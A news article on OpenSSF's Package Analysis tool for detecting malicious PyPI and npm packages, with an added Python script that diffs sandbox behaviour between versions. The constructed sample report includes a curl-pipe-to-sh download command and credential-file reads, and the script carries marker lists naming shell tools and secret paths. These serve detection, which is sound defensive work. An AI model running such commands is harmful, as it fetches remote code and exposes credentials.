Source: [1]https://thehackernews.com/2022/05/heres-new-tool-that-scans-for-malicious.html

The Open Source Security Foundation (OpenSSF) has announced the initial prototype release of a new tool that performs dynamic analysis of packages uploaded to popular open source repositories. Called the [2]Package Analysis project, the initiative aims to secure open source packages by detecting and alerting users to malicious behavior, with the goal of bolstering the security of the software supply chain and increasing trust in open source software.
"The Package Analysis project seeks to understand the behavior and capabilities of packages available on open source repositories: what files do they access, what addresses do they connect to, and what commands do they run?" the OpenSSF [4]said. "The project also tracks changes in how packages behave over time, to identify when previously safe software begins acting suspiciously," the foundation's Caleb Brown and David A. Wheeler added.
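The second half of that description, detecting when a previously safe package starts acting suspiciously, comes down to diffing sandbox observations between versions. The script below is an added example written for this page, not code from the OpenSSF Package Analysis project (whose report schema is different); the report shape (sets of files, hosts and commands observed during install and import), the sensitive-path and command markers, and the two sample reports are all constructed assumptions:

```python
"""Diff the observed runtime behaviour of two versions of a package.

Added example, not part of the OpenSSF Package Analysis project.  The
report format below (sets of files touched, hosts contacted, commands
spawned while a package is installed and imported in a sandbox) is a
simplified assumption, as are the marker lists and the sample reports.
"""
from __future__ import annotations

from dataclasses import dataclass


@dataclass(frozen=True)
class Behavior:
    """One sandbox run's observations for a single package version (assumed schema)."""
    files: frozenset[str] = frozenset()
    hosts: frozenset[str] = frozenset()
    commands: frozenset[str] = frozenset()


# Hypothetical markers; tune to the ecosystem you scan.
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/.ssh/", "/.aws/", "/.npmrc", "/.pypirc")
BENIGN_HOSTS = frozenset({"pypi.org", "files.pythonhosted.org", "registry.npmjs.org"})
SUSPICIOUS_COMMAND_MARKERS = ("curl ", "wget ", "base64", "/bin/sh -c", "bash -c", "nc ", "chmod +x")


def diff_behavior(baseline: Behavior, candidate: Behavior) -> dict:
    """Return what the candidate version does that the baseline did not,
    plus the subset of those new observations that look suspicious.

    Only *new* observations are judged: behaviour already present in the
    baseline is assumed to have been reviewed when that version was scanned.
    """
    new = {
        "files": sorted(candidate.files - baseline.files),
        "hosts": sorted(candidate.hosts - baseline.hosts),
        "commands": sorted(candidate.commands - baseline.commands),
    }
    findings: list[str] = []
    for path in new["files"]:
        if any(marker in path for marker in SENSITIVE_PATHS):
            findings.append(f"new access to sensitive path: {path}")
    for host in new["hosts"]:
        # Anything outside the package index itself is a new egress destination.
        if host not in BENIGN_HOSTS:
            findings.append(f"new network destination: {host}")
    for cmd in new["commands"]:
        if any(marker in cmd for marker in SUSPICIOUS_COMMAND_MARKERS):
            findings.append(f"new suspicious command: {cmd}")
    return {"new": new, "findings": findings}


# Constructed sample reports (not real scan output).  Version 1.0.0 behaves
# like an ordinary build; 1.0.1 additionally reads cloud credentials, talks to
# a host in the TEST-NET-3 documentation range and pipes a download into sh.
BASELINE_V1_0_0 = Behavior(
    files=frozenset({"/tmp/build/setup.py", "/tmp/build/pkg/__init__.py"}),
    hosts=frozenset({"pypi.org", "files.pythonhosted.org"}),
    commands=frozenset({"python setup.py install"}),
)
CANDIDATE_V1_0_1 = Behavior(
    files=frozenset({
        "/tmp/build/setup.py",
        "/tmp/build/pkg/__init__.py",
        "/tmp/build/README.md",            # new but harmless
        "/home/user/.aws/credentials",     # new and sensitive
    }),
    hosts=frozenset({"pypi.org", "files.pythonhosted.org", "203.0.113.10"}),
    commands=frozenset({
        "python setup.py install",
        '/bin/sh -c "curl http://203.0.113.10/x | sh"',
    }),
)


def analyze_samples() -> dict:
    """Run the diff on the constructed sample reports."""
    return diff_behavior(BASELINE_V1_0_0, CANDIDATE_V1_0_1)


if __name__ == "__main__":
    result = analyze_samples()
    for line in result["findings"]:
        print("ALERT:", line)
```

The point of diffing rather than scoring each version in isolation is that a maintainer-account takeover or a hijacked release typically lands as a small, late change to a package with a long benign history; a per-version classifier that has learned the package is "safe" tends to miss it, while the set difference makes the new credential read, the new egress host and the new shell pipeline stand out directly.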
In a test run that lasted a month, the tool identified more than [5]200 malicious packages uploaded to PyPI and npm, the majority of the rogue libraries relying on [6]dependency confusion and [7]typosquatting attacks.

References
1. https://thehackernews.com/2022/05/heres-new-tool-that-scans-for-malicious.html
2. https://github.com/ossf/package-analysis
4. https://openssf.org/blog/2022/04/28/introducing-package-analysis-scanning-open-source-packages-for-malicious-behavior/
5. https://github.com/ossf/package-analysis/blob/main/docs/case_studies.md
6. https://thehackernews.com/2021/02/dependency-confusion-supply-chain.html
7. https://thehackernews.com/2022/02/25-malicious-javascript-libraries.html